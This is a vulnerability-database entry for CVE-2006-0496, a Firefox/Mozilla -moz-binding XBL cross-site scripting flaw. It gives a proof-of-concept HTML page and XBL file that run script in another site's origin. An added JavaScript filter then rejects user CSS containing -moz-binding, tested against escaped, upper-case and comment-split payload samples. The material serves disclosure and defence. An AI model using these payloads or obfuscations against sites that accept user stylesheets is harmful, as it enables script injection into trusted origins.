Mozilla Firefox XBL -moz-binding property cross-site scripting vulnerability

Vulnerability ID: 1109685    Type: Cross-site scripting
Published: 2006-01-30    Updated: 2006-04-28
CVE ID: CVE-2006-0496    CNNVD ID: CNNVD-200601-377
Platform: Linux    CVSS score: 4.3
|Sources
https://www.exploit-db.com/exploits/27150
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-377
|Details
A cross-site scripting vulnerability exists in Mozilla 1.7.12 and earlier, Mozilla Firefox 1.0.7 and earlier, and Netscape 8.1 and earlier. A remote attacker can inject arbitrary web script or HTML via the -moz-binding CSS (Cascading Style Sheets) property, which does not require that a stylesheet, or the XBL binding it loads, have the same origin as the web page that applies it.
|Exploit
source: http://www.securityfocus.com/bid/16427/info

Mozilla Firefox is prone to a security vulnerability that may let a web page execute malicious script code in the context of another domain.

The issue affects the '-moz-binding' CSS property. The XBL file it names is fetched from any origin, and the binding's constructor script then runs with the privileges of the document that applied the style, not those of the origin that served the binding.

An attacker who can get a stylesheet into a trusted site (for example, through a user-customisable style feature) can therefore point -moz-binding at XBL hosted on a server they control and run script in the trusted site's origin. This could allow a malicious site to access the properties of a trusted site and facilitate various attacks, including disclosure of sensitive information.

http://domain1/path/to/page.html :

<html>
<head>
<!-- The page on domain1 applies a binding served by domain2; no same-origin check is made on the binding. -->
<style>
body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
</style>
</head>
<body>
</body>
</html>

http://domain2/path/to/xbl.xml :

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">

<!-- The constructor runs in the origin of domain1 (the page that applied the style), not domain2. -->
<binding id="xss">
<implementation>
<constructor>
alert("XBL XSS");
</constructor>
</implementation>
</binding>

</bindings>
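The practical defence for a site that accepts user-supplied CSS (the situation in the LiveJournal reports listed below) is to refuse any stylesheet containing the -moz-binding property before it reaches an unpatched browser. The following is an added example written for this page, not Mozilla's or LiveJournal's code. It normalises the stylesheet the way a CSS tokenizer would (comments removed, backslash escapes decoded, case folded) before looking for the property, so that escaped or mixed-case spellings of the name do not slip past a plain substring match. The function names, the blocked-property list and the sample stylesheets are constructed for the example; the comment-split sample is flagged conservatively rather than because it is a known parser bypass.

```javascript
// Added example for this page (not Mozilla's or LiveJournal's code): a reject-list
// check for user-supplied CSS that flags the -moz-binding property even when the
// property name is obfuscated with CSS backslash escapes, comments or mixed case.
// Function names, the blocked-property list and the sample stylesheets are
// constructed for the example.

// Properties a site should never accept from users while this bug is unpatched:
// -moz-binding loads an XBL file whose constructor runs in the including page's
// origin, which is exactly the cross-site scripting shown in the exploit above.
const BLOCKED_PROPERTIES = ['-moz-binding'];

// Strip /* ... */ comments. Done before escape decoding, as a CSS tokenizer
// does, so an escape that decodes to "/" or "*" cannot open or close a comment.
function stripCssComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, '');
}

// Decode CSS backslash escapes the way the CSS tokenizer does:
//   \2d, \2D, \00002d   -> "-" (1-6 hex digits, one following whitespace eaten)
//   \-                  -> "-" (any other escaped character stands for itself)
// A backslash directly before a newline is left alone (string line continuation).
function decodeCssEscapes(css) {
  return css.replace(
    /\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?|\\([^\n\r\f])/g,
    (match, hex, ch) => {
      if (hex !== undefined) {
        const cp = parseInt(hex, 16);
        // NUL and out-of-range code points become U+FFFD, like the tokenizer.
        if (cp === 0 || cp > 0x10ffff) return '\ufffd';
        return String.fromCodePoint(cp);
      }
      return ch;
    }
  );
}

// Lower-case, comment-free, escape-free view of the stylesheet used for matching.
function normalizeCss(css) {
  return decodeCssEscapes(stripCssComments(css)).toLowerCase();
}

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Return every blocked declaration found, with the value the user supplied
// (for -moz-binding that is the url(...) naming the attacker's XBL file).
function findBlockedDeclarations(css) {
  const normalized = normalizeCss(css);
  const findings = [];
  for (const property of BLOCKED_PROPERTIES) {
    const re = new RegExp(escapeRegExp(property) + '\\s*:\\s*([^;}]*)', 'g');
    let m;
    while ((m = re.exec(normalized)) !== null) {
      findings.push({ property, value: m[1].trim() });
    }
  }
  return findings;
}

// Policy decision: reject the whole stylesheet rather than cutting the
// declaration out, since a partial edit can re-create a different parse.
function isSafeUserCss(css) {
  return findBlockedDeclarations(css).length === 0;
}

// Constructed samples: the exploit's own stylesheet, three obfuscated variants,
// and a benign stylesheet.
const SAMPLES = {
  plain: 'body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }',
  hexEscaped: 'body { \\2d moz-\\62 inding : url(http://domain2/path/to/xbl.xml#xss) }',
  upperCase: 'BODY { -MOZ-BINDING:url(http://domain2/path/to/xbl.xml#xss) }',
  commentSplit: 'body { -moz-/* x */binding: url(http://domain2/path/to/xbl.xml#xss) }',
  benign: 'body { color: #333; background: url(bg.png) }',
};

// Audit every sample and report the decision plus what was found.
function auditSamples() {
  const report = {};
  for (const [name, css] of Object.entries(SAMPLES)) {
    report[name] = { safe: isSafeUserCss(css), findings: findBlockedDeclarations(css) };
  }
  return report;
}

console.log(JSON.stringify(auditSamples(), null, 2));
```

Rejecting the whole submission is deliberate: deleting a matched declaration and keeping the rest can change how the remaining text tokenizes, and a filter that edits CSS has to get that right for every engine it serves. A site that must keep the rest of the stylesheet should re-serialise from a full CSS parse rather than patch the source text.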
|References

Source: bugzilla.mozilla.org
Link: https://bugzilla.mozilla.org/show_bug.cgi?id=324253
Source: XF
Name: mozilla-mozbinding-xss (24427)
Link: http://xforce.iss.net/xforce/xfdb/24427
Source: BID
Name: 16427
Link: http://www.securityfocus.com/bid/16427
Source: OSVDB
Name: 22924
Link: http://www.osvdb.org/22924
Source: VUPEN
Name: ADV-2006-0403
Link: http://www.frsirt.com/english/advisories/2006/0403
Source: MISC
Link: http://www.davidpashley.com/cgi/pyblosxom.cgi/computing/livejournal-mozilla-bug.html
Source: SECTRACK
Name: 1015563
Link: http://securitytracker.com/id?1015563
Source: SECTRACK
Name: 1015553
Link: http://securitytracker.com/id?1015553
Source: FULLDISC
Name: 20060128 -moz-binding CSS property: more XSS fun
Link: http://marc.theaimsgroup.com/?l=full-disclosure&m=113847912709062&w=2
Source: MISC
Link: http://community.livejournal.com/lj_dev/708069.html